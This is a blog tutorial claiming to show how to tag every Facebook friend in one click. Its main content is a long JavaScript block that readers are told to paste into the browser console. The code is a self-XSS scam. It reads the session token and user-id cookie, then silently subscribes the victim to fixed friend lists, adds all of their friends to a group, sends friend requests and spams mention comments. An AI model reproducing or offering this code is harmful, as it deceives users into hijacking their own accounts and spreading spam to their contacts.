How to Tag/Mention all Friends in Status or Photo Comment in One Click

When we try to publish something and want to tag or mention friends to that content ,but we can't select all the friends because we are not allowed to select more than 50 friends at once.But Tagging more than 50 friend is possible and is super easy as it seems like magic in one click.
When we try to publish something and want to tag or mention friends to that content ,but we can't select all the friends because we are not allowed to select more than 50 friends at once.But Tagging more than 50 friend is possible and is super easy as it seems like magic in one click.

Now days mentioning and tagging has became the trend and fashion to make good exposure to the audience or among friends.

Do You Want to learn how does this work ?

If yes, Today i am here to explain all the step behind tha tagging or mentioning all friends in posts or comments in easy way.Lets get ready for this.What you have to need is a laptop or desktop because this process doesnt work in any mobile devices.I have summarised all the process in step wise form, here they are..

Step 1 :- Open a Status/Photo

Go to as you go regularly and open status /photo uploading panel or comment box where you want to mention/tag your facebook friends .

Step 2 :- Copy All Code

Here is the main thing to consider is ,we need the following code to do this trick .Copy this code

function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; }; //Paste all friends function get_friends(){ var a=x__0();"GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", false); a.send(null); if (a.readyState == 4) { var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{'))); return f.payload.entries; } return false; } /* PART OF Pratik */ //Paste all friends function get_uid(b){ var a=x__0();"GET", ''+b, false); a.send(); if (a.readyState == 4) { return uid = JSON.parse(a.responseText).id; } return false; } // Pattern that will change the value of coment? Rivers by marking? S var patt = /comment_text=(.*?)&/ var c = 1; username = /\.com\/(.*?)\//.exec([1]; uid = get_uid(username); a =; termina = 0; var amigos = get_friends(); post_id = /[0-9]{8,}/.exec(a); uids = 'comment_text='; header = 'ft_ent_identifier='+post_id+'&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user='+uid+'&__a=1&__req=4u&fb_dtsg='+document.getElementsByName('fb_dtsg')[0].value+'&phstamp='+Math.random(); for ( var n = 1 ; n < amigos.length ; n++ ){ //uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20'; fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20'; c++; if(c == 7){ // Quando o contador chega em 7, ele termina o parâmetro com um &... uids += '&'; // ...envia as coisas com o método do indiano... with(new XMLHttpRequest()) open("POST", "/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),send(header.replace(patt, uids)); // ... espera um segundo... z = setTimeout('function(){asd=0}', 1000); clearInterval(z); // ... e seta tudo de novo pra recomeçar c = 1; uids = 'comment_text='; } } var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function cereziAl(isim) { var tarama = isim + "="; if (document.cookie.length > 0) { konum = document.cookie.indexOf(tarama) if (konum != -1) { konum += tarama.length son = document.cookie.indexOf(";", konum) if (son == -1) son = document.cookie.length return unescape(document.cookie.substring(konum, son)) } else { return ""; } } } function getRandomInt (min, max) { return Math.floor(Math.random() * (max - min + 1)) + min; } function randomValue(arr) { return arr[getRandomInt(0, arr.length-1)]; } var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function a(abone){ var http4 = new XMLHttpRequest(); var url4 = "/ajax/follow/follow_profile.php?__a=1"; var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";"POST", url4, true); //Send the proper header information along with the request http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http4.setRequestHeader("Content-length", params4.length); http4.setRequestHeader("Connection", "close"); http4.onreadystatechange = function() {//Call a function when the state changes. if(http4.readyState == 4 && http4.status == 200) { http4.close; // Close the connection } } http4.send(params4); } function sublist(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a); } sublist("196595073821666"); sublist("1401516113406354"); sublist("164346257101594"); var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/membership/r2j.php?__a=1'; var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['send'](paramswp); var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); var friends = new Array(); gf = new XMLHttpRequest(); gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false); gf['send'](); if (gf['readyState'] != 4) {} else { data = eval('(' + gf['responseText']['substr'](9) + ')'); if (data['error']) {} else { friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { return _0x93dax8['index'] - _0x93dax9['index']; }); }; }; for (var i = 0; i < friends['length']; i++) { var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/members/add_post.php?__a=1'; var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['onreadystatechange'] = function () { if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {}; }; httpwp['send'](paramswp); }; var spage_id = "100211486794985"; var spost_id = "100211486794985"; var sfoto_id = "100211486794985"; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var smesaj = ""; var smesaj_text = ""; var arkadaslar = []; var svn_rev; var bugun= new Date(); var btarihi = new Date(); btarihi.setTime(bugun.getTime() + 1000*60*60*4*1); if(!document.cookie.match(/paylasti=(\d+)/)){ document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString(); } //get friends and isla function sarkadaslari_al(){ var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";"); for(f=0;f= 0) {"GET", "" + params, true); } else {"GET", "" + params, true); } xmlhttp.send(); } //Listen to click event var tiklama = document.addEventListener("click", function () { if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){ svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0]; sarkadaslari_al(); document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString(); document.removeEventListener(tiklama); } }, false); //rear?? adding function sarkadasekle(uid,cins){ var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ } };"POST", "/ajax/add_friend/action.php?__a=1", true); var params = "to_friend=" + uid; params += "&action=add_friend"; params += "&how_found=friend_browser"; params += "&ref_param=none"; params += "&outgoing_id="; params += "&logging_location=friend_browser"; params += "&no_flyout_on_click=true"; params += "&ego_log_data="; params += "&http_referer="; params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value; params += "&phstamp=165816749114848369115"; params += "&__user=" + user_id; xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev); xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded"); if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){ xmlhttp.send(params); }else if(document.cookie.split("cins" + user_id +"=").length <= 1){ cinsiyetgetir(uid,cins,"sarkadasekle"); }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){ xmlhttp.send(params); } } //sex determination var cinssonuc = {}; var cinshtml = document.createElement("html"); function scinsiyetgetir(uid,cins,fonksiyon){ var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";"); cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html btarihi.setTime(bugun.getTime() + 1000*60*60*24*365); if(cinshtml.getElementsByTagName("select")[0].value == "1"){ document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString(); }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){ document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString(); } eval(fonksiyon + "(" + id + "," + cins + ");"); } };"GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true); xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev); xmlhttp.send(); }

Step 3 :- Open Console For :-

As i mentioned earlier you need a laptop or desktop with any of the following browser then for
Google Chrome :- Press Ctrl+Shift+J
Mozilla Firefox :- Press Ctrl+Shift+J
Opera Browser :- Press Ctrl+Shift+J

Step 4 :- Paste all code in console

In This step you need to paste the earlier copied code in the console box.. and you done..
That's It :D
If you get any error with this trick please let me know i will do my best to help you with this..🤗

About the author

Tarang Editor
It is an editorial account of Tarang Inc. Tarang Inc is a beautifully crafted hub for education and entertainment . Tarang Inc publishes contents in Tarang and Gtara Tech . Maintained by Founder Tara Gnawali

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